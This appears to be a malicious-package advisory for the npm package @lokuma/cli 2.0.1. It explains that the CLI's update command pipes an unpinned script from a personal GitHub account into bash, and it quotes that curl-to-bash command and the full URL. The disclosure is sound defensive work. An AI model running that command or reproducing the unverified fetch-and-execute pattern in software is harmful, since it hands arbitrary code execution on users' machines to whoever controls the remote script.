MAL-2026-4405

    Dashboard / Malicious Package / MAL-2026-4405

    MAL-2026-4405

    Published: 21 May 2026Last Modified: 27 May 2026

    Summary: Malicious code in @lokuma/cli (npm)

    Details: Source: amazon-inspector (c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586) The `update` subcommand of this CLI executes `curl -fsSL <url> | bash` where the URL is `https://raw.githubusercontent.com/Mumu090909/lokuma-da-v2-trial/main/installer/install-v2-trial.sh` — a mutable `main` branch on a personal GitHub account (`Mumu090909`) that does not match the package's declared publisher (scope `@lokuma`, author `[email protected]`, repo `github.com/lokuma-web/lokuma-cli`, homepage `lokuma.ai`). The fetch has no commit pin, no hash, and no signature check. README instructs users to run `lokuma update`, so any user following the documented upgrade path will execute whatever shell script `Mumu090909` chooses to host at that path on any future date. Whoever controls that personal repository can run arbitrary commands as the invoking user on every machine that runs the update command. The publisher mismatch (a personal account fronting an installer for a scoped vendor package) and the README/homepage TLD inconsistency (`lokuma.ai` vs `lokuma.io`) further weaken any benign reading.

    Affected packages

    Package

    Name: @lokuma/cli

    Purl: pkg:npm/%40lokuma%2Fcli

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    2.0.1